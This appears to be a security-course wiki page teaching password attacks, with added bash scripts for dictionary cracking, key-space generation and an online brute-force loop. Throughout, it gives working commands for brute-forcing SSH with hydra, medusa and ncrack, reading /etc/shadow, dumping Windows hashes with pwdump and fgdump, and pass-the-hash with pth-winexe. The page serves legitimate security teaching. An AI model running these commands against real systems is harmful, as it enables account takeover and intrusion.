Password Cracking Attacks - Paiet/SEC-335 GitHub Wiki
Dictionary Attacks
- A dictionary (word list) is a file containing one candidate password per line
- The cracking software hashes each word with the same algorithm the target used and compares the result with the stolen hash; a match reveals the password (password hashes are not decrypted, they are guessed)
- Where do dictionaries come from?
  - Download them
    - https://wiki.skullsecurity.org/index.php?title=Passwords
    - rockyou.txt
    - john.txt (comes with John the Ripper)
  - Create them
    - `cewl` spiders a web site, collects every word of at least the given length and writes them to a file; company names, product names and local jargon from the target's own pages make good candidates
    - `cewl kioptrix3.com -m 6 -w kioptrix_dict.txt` (words of 6 or more characters from kioptrix3.com, written to kioptrix_dict.txt)
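The comparison loop described above, as an added example that is not part of the wiki or of any cracker's own code. It uses unsalted SHA-256 so it runs with coreutils only; the word list and the "user:hash" file are constructed in the script. The `crack_file` function hashes each candidate once and looks it up against every uncracked target, which is what makes unsalted dumps fall so quickly; salted or slow hashes (shadow, NTLM, bcrypt) change only the hashing step.

```bash
#!/usr/bin/env bash
# Added example (not from the wiki): the core loop of a dictionary attack.
# Every candidate is hashed with the target's algorithm and compared with
# the stolen hash; nothing is "decrypted". Unsalted SHA-256 keeps this
# runnable with coreutils alone.

# hash_word WORD -> hex SHA-256 of WORD (no trailing newline is hashed)
hash_word() {
    printf '%s' "$1" | sha256sum | cut -d' ' -f1
}

# Constructed stand-in for rockyou.txt; prints the path of a temp file.
make_wordlist() {
    local f
    f=$(mktemp)
    printf '%s\n' password 123456 letmein Summer2019 kioptrix welcome > "$f"
    echo "$f"
}

# crack_hash TARGET_HEX WORDLIST -> prints the password and returns 0,
# returns 1 when the list is exhausted
crack_hash() {
    local target="$1" wordlist="$2" word tried=0
    while IFS= read -r word; do
        tried=$((tried + 1))
        if [ "$(hash_word "$word")" = "$target" ]; then
            echo "$word"
            return 0
        fi
    done < "$wordlist"
    echo "no match after $tried candidates" >&2
    return 1
}

# crack_file HASHFILE WORDLIST
# HASHFILE holds john-style "user:hash" lines (one user per distinct hash
# is assumed). Each candidate is hashed ONCE and looked up against all
# uncracked targets: with unsalted hashes the cost is per candidate, not
# per candidate x user. Prints "user:password" per hit; returns 0 only
# when every hash was cracked.
crack_file() {
    local hashfile="$1" wordlist="$2" user hash word h found=0 total=0
    declare -A targets
    while IFS=: read -r user hash; do
        targets["$hash"]="$user"
        total=$((total + 1))
    done < "$hashfile"
    while [ "$found" -lt "$total" ] && IFS= read -r word; do
        h=$(hash_word "$word")
        if [ -n "${targets[$h]+x}" ]; then
            echo "${targets[$h]}:$word"
            unset 'targets[$h]'
            found=$((found + 1))
        fi
    done < "$wordlist"
    echo "cracked $found of $total hashes" >&2
    [ "$found" -eq "$total" ]
}
```

`crack_file` stops reading the word list as soon as every target is cracked; with a salted format each target would need its own hash computation per candidate, which is exactly the cost salts are there to impose.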
- Password Mutation
  - Passwords often have to meet a policy
    - At least 1 number
    - Number must be at beginning/middle/end of password
    - At least 1 special character (!@#$%^ etc.)
    - At least x characters long
  - A plain dictionary rarely contains "Summer2019!" but it does contain "summer", so modify the dictionary (capitalize, append digits and symbols, ...) to match the policy before attacking
  - Create a Bash script, or use the rules engine built into the cracker (see the John the Ripper rules below)
Brute-Force Attacks
- Attempting every possible combination of a character set
  - a, aa, aaa, aaaa, A, AA, AAA, AAAA, etc.
  - Time consuming: the key space grows exponentially with length (26 lower-case letters at length 8 is 26^8, about 2 x 10^11 candidates)
  - Resource consuming
- Key-space Brute-Force
  - `crunch` generates every combination of the given characters and lengths and can save them to a file, i.e. a dictionary built from the whole key space
  - These files can get LARGE!!! (each candidate is one line, so size = number of candidates x (length + 1) bytes)
  - `crunch 4 4 0123456789ABC -o crunch_file.txt` (all 4-character strings over 0-9 and A-C, 13^4 = 28561 lines)
  - `-f /usr/share/crunch/charset.lst <name>` uses a pre-defined character set from charset.lst, e.g.
    - `mixalpha` (upper- and lower-case letters only)
    - `numeric` (digits only)
    - `mixalpha-numeric-all-space` (letters, digits, all symbols and space)
  - `-t <pattern>` fixes part of the password and brute-forces only the placeholders:
    - `,` = upper-case letter
    - `@` = lower-case letter
    - `^` = special characters, including space
    - `%` = number
  - `crunch 8 8 -t ^,@@^@%%` (8-character strings: symbol, upper, lower, lower, symbol, lower, digit, digit)
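A small key-space generator that understands the `-t` placeholders above, added here as an example; it is not crunch's code and not from the wiki. Its point is the "files can get LARGE" warning: `keyspace_size` and `keyspace_bytes` show the count and on-disk size of a pattern before anything is written, and `expand` produces the candidates themselves for patterns small enough to use. The symbol set is a constructed, reduced one (crunch's own is larger), so counts for `^` are only illustrative.

```bash
#!/usr/bin/env bash
# Added example (not from the wiki, not crunch's code): a tiny key-space
# generator with crunch-style -t placeholders.
#   , = upper-case letter   @ = lower-case letter
#   % = digit               ^ = symbol (including space)
# Any other character in the pattern is kept literally.

UPPER=ABCDEFGHIJKLMNOPQRSTUVWXYZ
LOWER=abcdefghijklmnopqrstuvwxyz
DIGIT=0123456789
# Constructed, reduced symbol set (assumption; crunch's real set is larger).
SYMBOL='!@#$%^&*()-_+=[]{}:;<>,.?/ '

# charset_for CH -> the characters a pattern position can take
charset_for() {
    case "$1" in
        ,) printf '%s' "$UPPER" ;;
        @) printf '%s' "$LOWER" ;;
        %) printf '%s' "$DIGIT" ;;
        ^) printf '%s' "$SYMBOL" ;;
        *) printf '%s' "$1" ;;      # literal character, one choice
    esac
}

# keyspace_size PATTERN -> number of candidates (product of the class sizes)
keyspace_size() {
    local pattern="$1" i cs n=1
    for ((i = 0; i < ${#pattern}; i++)); do
        cs=$(charset_for "${pattern:i:1}")
        n=$(( n * ${#cs} ))
    done
    echo "$n"
}

# keyspace_bytes PATTERN -> bytes crunch would write: one line per
# candidate, each pattern-length characters plus a newline
keyspace_bytes() {
    local pattern="$1"
    echo $(( $(keyspace_size "$pattern") * (${#pattern} + 1) ))
}

# expand PATTERN [PREFIX] -> every candidate, one per line, by recursing
# over the Cartesian product of the position classes
expand() {
    local pattern="$1" prefix="${2-}" cs i
    if [ -z "$pattern" ]; then
        printf '%s\n' "$prefix"
        return
    fi
    cs=$(charset_for "${pattern:0:1}")
    for ((i = 0; i < ${#cs}; i++)); do
        expand "${pattern:1}" "$prefix${cs:i:1}"
    done
}

# Usage: ./keyspace.sh PATTERN  (prints count and size; add "expand" to list)
if [ $# -ge 1 ]; then
    echo "$(keyspace_size "$1") candidates, $(keyspace_bytes "$1") bytes"
    if [ "${2-}" = expand ]; then expand "$1"; fi
fi
```

Run `keyspace_size` on the wiki's own `^,@@^@%%` before running crunch with it: even with this reduced symbol set it is in the tens of billions of lines, which is why such patterns are piped straight into the cracker rather than saved to disk.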
Password attack/crack tools
- John the Ripper
  - `john stolen_pass.txt` (default modes: "single crack", then the built-in word list, then incremental brute-force)
  - `john stolen_pass.txt --wordlist=myDictionary.txt` (dictionary attack)
  - Password Mutations
    - Add a named rule set to /etc/john/john.conf, one rule per line (`c` = capitalize the word, `Az"..."` = append the string; a character class such as `[0-9]` expands into one rule per character, so the second line tries every two-digit suffix):

      ```
      [List.Rules:Example]
      cAz"[0-9]"
      cAz"[0-9][0-9]"
      cAz"[!@$&*]"
      cAz"[0-9][!@$&*]"
      ```

    - Invoke the custom rule set: `john hash.txt --wordlist=custom_dict.txt --rules=Example`
    - https://www.gracefulsecurity.com/custom-rules-for-john-the-ripper/
    - https://www.gracefulsecurity.com/custom-rules-for-john-the-ripper-examples/
  - `unshadow passwd.txt shadow.txt > unshadow.txt` (merges /etc/passwd and /etc/shadow into the one-file format john expects)
    - and then `john unshadow.txt --wordlist=myDictionary.txt --rules=myRules`
  - `john --show stolen_pass.txt` (shows the already cracked passwords for the given file)
- Others
  - l0phtcrack
  - ophcrack (rainbow tables for Windows LM/NTLM hashes)
  - Cain & Abel
  - hashcat (GPU-accelerated)
  - rainbowcrack
  - Online crackers
Online Brute-Force
- Guesses credentials against a live network service instead of a stolen hash
  - HTTP, SSH, VNC, FTP, SNMP, POP3, etc.
  - Far slower than offline cracking (one network round trip per guess) and noisy: failed logins are logged and accounts may lock out, so use a short, targeted list
- Could write a script
  - Show bash Brute-Force script :)
- Use a tool for automation
  - Hydra
  - Medusa
  - Ncrack
- Attacking SSH on 127.0.0.1 as user ftp2 with rockyou.txt, the same attack in each tool:
  - `hydra -l ftp2 -P rockyou.txt 127.0.0.1 ssh`
  - `medusa -h 127.0.0.1 -u ftp2 -P rockyou.txt -M ssh`
  - `ncrack -vv --user ftp2 -P rockyou.txt ssh://127.0.0.1`
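The shape of a hand-rolled online brute-force loop, as an added example (not the wiki's script and not from hydra/medusa/ncrack). The single attempt is isolated in `try_login` so the driver is service-independent; because the script must run offline, `try_login` here is a constructed stand-in for a service with one valid credential pair and a lockout after five failures. Swapping it for a real probe (an `sshpass` + `ssh` call, a `curl` POST to a login form) is the only change needed. The user name, password, threshold and word list are all constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the wiki): online brute-force driver with the
# attempt isolated in one function and lockout detection in the loop.

# Constructed stand-in for the target service (assumption: one valid pair,
# lockout after LOCKOUT_THRESHOLD failed attempts for the same user).
VALID_USER=ftp2
VALID_PASS=Summer2019
LOCKOUT_THRESHOLD=5
declare -A failures

# try_login USER PASS -> 0 success, 1 wrong password, 2 account locked.
# Replace the body with a real probe, e.g.
#   sshpass -p "$pass" ssh -o StrictHostKeyChecking=no "$user@$HOST" true
# mapping its exit status onto the same three codes.
try_login() {
    local user="$1" pass="$2"
    if [ "${failures[$user]:-0}" -ge "$LOCKOUT_THRESHOLD" ]; then
        return 2
    fi
    if [ "$user" = "$VALID_USER" ] && [ "$pass" = "$VALID_PASS" ]; then
        return 0
    fi
    failures[$user]=$(( ${failures[$user]:-0} + 1 ))
    return 1
}

# brute USER WORDLIST -> prints "user:pass" and returns 0 on success,
# 2 when the account locks out (stop, do not burn the rest of the list),
# 1 when the list is exhausted
brute() {
    local user="$1" wordlist="$2" pass tried=0 rc
    while IFS= read -r pass; do
        tried=$((tried + 1))
        rc=0
        try_login "$user" "$pass" || rc=$?
        case $rc in
            0) echo "$user:$pass"
               echo "success after $tried attempts" >&2
               return 0 ;;
            2) echo "$user locked out after $tried attempts, stopping" >&2
               return 2 ;;
        esac
    done < "$wordlist"
    echo "$user: wordlist exhausted ($tried attempts)" >&2
    return 1
}

# Usage: ./brute.sh USER WORDLIST
if [ $# -eq 2 ]; then
    brute "$1" "$2"
fi
```

Two things the tools above do for you that this loop makes visible: stopping at the first success, and recognising a lockout as a distinct outcome rather than "wrong password" (otherwise every remaining guess is wasted and the account stays locked for the legitimate user).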
Password grabbing
- Linux
  - Read/copy the /etc/shadow file (root only; it holds the salted password hashes, /etc/passwd holds only the account details)
- Windows
  - The SAM database holding the hashes is locked by the OS while Windows is running (and its contents are encrypted with the boot key), but the hashes are loaded into memory for authentication
  - Grab the hashes from memory (needs administrator rights) using
    - `pwdump` (dumps the local machine only)
      - `pwdump -o dumpfile.txt -u admin_user computer_name`
      - `pwdump -o dumpfile.txt -u administrator ADMINWRKSTATION`
    - `fgdump` (can also dump remote hosts)
      - `fgdump.exe -h 127.0.0.1 -u admin_user`
- Clear-text
  - Use Wireshark to grab credentials from protocols that send them unencrypted: Telnet, FTP, POP3, etc.
Passing the Hash
- Hash value doesn't always need to be cracked
  - With NTLM the NT hash itself is the secret used in the challenge-response, so you can authenticate by passing the hash value in place of the password
- Caveats
  - This works against NTLM authentication
    - Windows
    - Linux/Samba using NTLM
  - Any service accepting LM or NTLM (v1 and v2) authentication is vulnerable
    - Look for SMB services/ports (TCP 445, and 139 for NetBIOS)
  - Read the SANS Institute white paper here >> http://tinyurl.com/zkzsmwd
  - A word on Windows 10
    - The attack itself still works against Windows 10 once you have a hash; what Windows 10 adds is Credential Guard, which (where enabled) keeps the hashes out of reach of the dumping tools above. Credential Guard is not loaded when the machine is booted into Safe Mode, so the hashes can be grabbed and passed then
- How to pass the hash
  - `pth-winexe -U administrator%EMPTY-LM-HASH:HASH-FROM-FGDUMP //ip cmd`
  - The credential is given as `user%LMHASH:NTHASH`; the "empty" LM hash is `aad3b435b51404eeaad3b435b51404ee`, the NT hash is the one from the pwdump/fgdump output, and `cmd` is the command to run on the remote host